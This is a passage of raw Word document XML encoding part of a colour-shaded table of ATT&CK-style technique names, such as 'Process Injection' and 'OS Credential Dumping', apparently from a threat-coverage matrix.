              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>External Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62C05358" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Hijack Execution Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="074A41AC" w14:textId="399D216F" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Email Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46C609C6" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Network Sniffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3671C3CD" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Domain Trust Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45716544" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A46BAB8" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data from Network Shared Drive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7675F696" w14:textId="1DF67FB8" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Multi-Stage Channels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2681DF37" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F5D0B3C" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Network Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A9423C" w:rsidRPr="001019D3" w14:paraId="2BC40D51" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76339C7F" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3507A787" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01B2B565" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FE5A4E1" w14:textId="1B8412D4" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Serverless Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67F326A0" w14:textId="54765722" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Hijack Execution Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="761DC5A0" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Process Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F3394D7" w14:textId="2A3D8D1C" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Execution Guardrails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28E1F6EA" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>OS Credential Dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FCA3DC1" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CB011A6" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59A1BC95" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data from Removable Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CCC9192" w14:textId="148E6DE5" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Non-Application Layer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EF96807" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0118B428" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Resource Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A9423C" w:rsidRPr="001019D3" w14:paraId="25A6FE22" w14:textId="77777777" w:rsidTr="004C32C3">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B3FAB67" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="749F5EA0" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20FE1E45" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FDBFBC8" w14:textId="34D30CE8" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Shared Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="455702C5" w14:textId="5AF99548" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Implant Internal Image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3612149C" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Scheduled Task/Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EAD84BA" w14:textId="165B2865" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exploitation for Defence Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11C9CE88" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Steal Application Access Token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0604EDBC" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Group Policy Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0620ECDD" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="382B8A2A" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data Staged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="796049B7" w14:textId="371A9893" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Non-Standard Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DF8F739" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53314EC0" w14:textId="77777777" w:rsidR="00A9423C" w:rsidRPr="001019D3" w:rsidRDefault="00A9423C" w:rsidP="00A9423C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
